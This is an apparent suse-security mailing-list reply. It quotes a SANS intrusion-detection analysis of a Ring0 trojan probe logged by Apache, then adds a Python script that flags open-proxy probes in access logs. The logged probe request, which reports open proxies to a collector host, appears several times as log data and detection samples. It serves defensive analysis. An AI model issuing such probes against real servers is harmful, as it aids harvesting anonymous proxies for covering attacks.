Ring0 (that was a nifty one):
http://www.sans.org/y2k/practical/Haruna_Isa.txt
Detect #4: Ring0
Apache Access Log View
194.209.172.145 - - [03/Feb/2000:15:06:27 -0500] "GET http://www.rusftpsearch.net/cgi-bin/pst.pl?pstmode=writeip&psthost=a.cable.host&pstport=80 HTTP/1.0" 404 292
1. Identity
194.209.172.145/border1.leunet.ch
Whois: Leunet, Frauenfeld, Switzerland
WWW (www.leunet.ch): Leunet Internet Provider
2. Technique
Attempting to send back to web server www.rusftpsearch.net that the
targeted host is running an anonymous web proxy. The machine
conducting the probe has likely been compromised by the Ring0 trojan.
3. Intent
Compiling a list of anonymous web proxies. If the targeted machine had
been running an anonymous web proxy, it would have accessed the
cgi-script at www.rusftpsearch.net and passed its IP address as an
argument. Presumably, the cgi script would add the IP address to a
list of anonymous web proxies it was compiling. Trojan'd computers do
the scanning; therefore the owner of the originating computer in this
case might be unaware of the activity.
4. Active Targeting
Sort of. The Trojan randomly selects addresses to probe for web
proxies. Also, the owner of the source machine is likely unaware of
the activities of the Trojan.
5. Evaluation
Anonymous web proxies allow any user to proxy a web connection through
them, thus hiding the source address of that user. A web site accessed
through the proxy would record the address of the proxy as the source.
This mechanism is a favorite with hackers to hide their identity when
mounting attacks or doing recon. These probes are conducted by the
Ring0 trojan. The source name 'border1' seems to be indicative of some
type of network border device (firewall, NAT device, etc.). Since this
is an ISP, the actual compromised machine might be behind the 'border'
device thus the address we have is not necessarily the address of the
compromised machine.
Bottom Line: Low threat. The targeted machine is not running an
anonymous web proxy. The web server which logged the access denied the
request.
Kurt Seifried, seifried@securityportal.com
Securityportal - your focal point for security on the 'net
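Detection logic for the probe pattern described in the quoted detect, as an added example that is not from the thread or from the SANS practical: it parses Apache access-log lines, flags request lines whose target is an absolute URL (a forward-proxy request an origin web server should not normally see), and records whether the server refused or relayed it. The log lines below are constructed; the first copies the request from the thread.

```python
"""Flag open-proxy probes like the Ring0/pst.pl one in Apache access logs."""
import re
from urllib.parse import urlsplit, parse_qs

# Apache common/combined log format: the request line is the first quoted field.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<when>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)(?: (?P<proto>[^"]*))?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample lines: the first mirrors the probe from the thread (refused
# with 404); the third is what a log would show had the server relayed the request.
SAMPLE_LOG = """\
194.209.172.145 - - [03/Feb/2000:15:06:27 -0500] "GET http://www.rusftpsearch.net/cgi-bin/pst.pl?pstmode=writeip&psthost=a.cable.host&pstport=80 HTTP/1.0" 404 292
10.0.0.7 - - [03/Feb/2000:15:07:01 -0500] "GET /index.html HTTP/1.0" 200 1043
192.0.2.9 - - [03/Feb/2000:15:08:13 -0500] "GET http://www.rusftpsearch.net/cgi-bin/pst.pl?pstmode=writeip&psthost=203.0.113.5&pstport=80 HTTP/1.0" 200 51
"""

def classify(line):
    """Return None for an ordinary request, or a dict describing a proxy probe.

    A request target that is an absolute URL (scheme://host/...) asks the web
    server to act as a forward proxy; an origin server only sees that from
    misconfigured clients or from open-proxy probes.
    """
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if not parts.scheme or not parts.netloc:
        return None  # relative path: normal origin-server request
    qs = parse_qs(parts.query)
    return {
        "client": m.group("client"),
        "proxy_to": parts.netloc,
        "status": int(m.group("status")),
        # 2xx means the server actually relayed the request; 4xx means it refused
        "relayed": m.group("status").startswith("2"),
        # the writeip probe carries the address the prober thinks the proxy has
        "reported_host": qs.get("psthost", [None])[0],
    }

def proxy_probes(log_text):
    """All proxy-probe records found in a block of log text."""
    return [hit for hit in (classify(l) for l in log_text.splitlines()) if hit]

if __name__ == "__main__":
    for hit in proxy_probes(SAMPLE_LOG):
        print(hit)
```

A relayed hit (2xx) is the one worth escalating: it means the server did act as a proxy and its address was likely reported to the collector.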
----- Original Message -----
From: "Ulrich Klenk"
Hello all,
found this one in an Apache access-log-file:
"GET http://www.rusftpsearch.net/cgi-bin/pst.pl?pstmode=writeip&psthost=195.37.62.127&pstport=80".
Can someone please point me to some information for that probe? What were they doing?
I found something about this in the list for December 1999, but there are only discussions about rusftpsearch.net.
Greetings, Uli
---------------------------------------------------------------------
To unsubscribe, e-mail: suse-security-unsubscribe@suse.com
For additional commands, e-mail: suse-security-help@suse.com